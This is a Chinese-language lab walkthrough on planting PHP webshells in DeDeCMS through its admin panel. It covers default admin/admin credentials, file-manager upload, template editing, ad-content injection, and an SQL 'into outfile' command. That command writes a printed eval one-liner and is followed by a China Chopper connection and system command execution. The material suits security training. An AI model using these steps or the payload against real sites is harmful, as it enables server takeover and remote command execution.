DeDeCMS靶场
通过⽂件管理器上传WebShel
步骤⼀:访问⽬标靶场其思路为
dedecms
后台可以直接上传任意⽂件,可以通过⽂件管理器上传
php⽂件获取webshell
#
后台
http:
//【自己的IP】/dede
username:
admin
password
:
admin
步骤⼆:登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK
步骤三:访问上传成功后的⽂件
修改模板⽂件拿WebShell
步骤⼀:与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》
【
index.htm
】 --> 【修改】 在⽂件修改中添加⼀句话代码
步骤⼆:点击 【⽣成】 --》 【更新主⻚
HTML
】 --》将主⻚位置修改为 【
../index.php
】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化
后台任意命令执⾏拿WebShell
步骤⼀:点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】
步骤⼆:点击【代码】--》在图中显示的路径与站点进⾏拼接....访问测试!
步骤三:使⽤菜⼑连接测试...
通过后台sql命令执⾏拿webshell
1.访问系统---sql命令⾏⼯具---执⾏ select @@ basedir,获取mysql路径,由此瑞测⽹站绝对路径
2.into outfile写⼊⼀句话⽊⻢
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php
3.访问webshell.php 并测试执⾏系统命令
